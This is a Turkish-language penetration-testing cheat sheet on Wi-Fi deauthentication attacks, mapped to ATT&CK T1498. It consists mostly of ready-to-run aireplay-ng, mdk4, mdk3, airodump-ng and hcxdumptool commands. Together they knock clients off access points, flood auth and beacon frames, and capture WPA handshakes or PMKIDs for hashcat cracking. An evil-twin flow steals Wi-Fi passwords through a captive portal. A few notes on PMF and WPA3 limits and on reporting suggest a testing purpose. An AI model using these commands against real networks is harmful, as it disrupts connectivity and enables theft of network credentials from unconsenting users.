Skip to content

Deauthentication Saldırıları

ATT&CK T1498 difficulty: kolay

Korumasız 802.11 yönetim çerçevelerinde deauthentication / disassociation kimlik doğrulaması gerektirmez (802.11w/PMF yoksa). Saldırgan sahte deauth göndererek istemcileri AP’den düşürür; bu hem DoS’tur hem de yeniden bağlanma sırasında WPA2 handshake yakalama ve evil twin’e kayma için kullanılır.

- Monitor + injection çalışan arayüz (aireplay-ng -9 testi)
- Hedef AP BSSID + kanal; mümkünse istemci MAC
- airodump aynı kanalda dinliyor olmalı (handshake için)
- PMF (802.11w) zorunlu / WPA3 ağlarda klasik deauth etkisiz veya azalmış olabilir
Terminal window
sudo aireplay-ng -9 wlan0mon
Terminal window
sudo iw dev wlan0mon set channel 6
Terminal window
iwconfig wlan0mon # Mode:Monitor, Frequency doğru kanal
Terminal window
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Terminal window
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
Terminal window
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
Terminal window
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CLIENT wlan0mon
Terminal window
sudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:FF
Terminal window
sudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:FF -S CC:DD:EE:FF:00:11
Terminal window
echo "AA:BB:CC:DD:EE:FF" > ap.txt
Terminal window
sudo mdk4 wlan0mon d -b ap.txt
Terminal window
sudo mdk3 wlan0mon d -b blacklist.txt
Terminal window
sudo bettercap -iface wlan0mon

Handshake / evil twin akışında kullanım

Section titled “Handshake / evil twin akışında kullanım”
  1. Dinlemeyi başlat — kanal ve BSSID kilitli:

    Terminal window
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
  2. Hedefli deauth — bağlı bir STATION seç; 3–10 deauth yeterli. Aşırı flood bazen istemciyi uzaklaştırır veya PMKID/EAPOL kaçırılır.

  3. Doğrula — airodump sağ üstte WPA handshake: BSSID veya:

    Terminal window
    hcxpcapngtool -o t.22000 cap-01.cap && grep WPA t.22000
  4. Evil twin — gerçek AP’ye sürekli deauth + aynı SSID rogue AP; istemciler sahte AP’ye kayabilir (ikinci arayüz şart).

Terminal window
sudo hcxdumptool -i wlan0mon -w dump.pcapng --enable_status=15
Terminal window
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF # auth DoS
Terminal window
sudo mdk4 wlan0mon b -f ssid.txt # beacon flood
Yanlış kanal → "Injection is working" ama istemci düşmez
5 GHz DFS / geniş CH → doğru center freq (iw set channel 36)
İki anten / mesafe → AP ile istemci arasına fiziksel olarak yaklaş
Client power-save → birkaç burst deauth tekrarla
Terminal window
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon
Optional PMF → bazı istemciler hâlâ düşer
Required PMF → korumalı yönetim çerçevesi; klasik aireplay genelde başarısız
WPA3-SAE → PMF zorunlu varsayılan; deauth ile handshake zorla az işe yarar
→ PMKID/SAE saldırıları veya evil twin (farklı senaryo)

Testte airodump / Wireshark’ta RSN capabilities PMF bit’lerine bakın.

Terminal window
sudo timeout 15 aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon

Rapor için: etkilenen BSSID, süre, istemci MAC (anonimleştirilmiş), ekran görüntüsü.

aireplay · deauth

embedded tool
Generated command
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
airodump kilitli kanal
→ aireplay-ng --deauth 5 -a AP -c CLIENT
→ WPA handshake yakalandı
→ hashcat 22000
hostapd evil twin ayakta
→ mdk4 deauth gerçek BSSID
→ istemci rogue'a bağlanır → captive portal PSK
PMF required → deauth bırak
→ hcxdumptool PMKID veya bekle doğal reconnect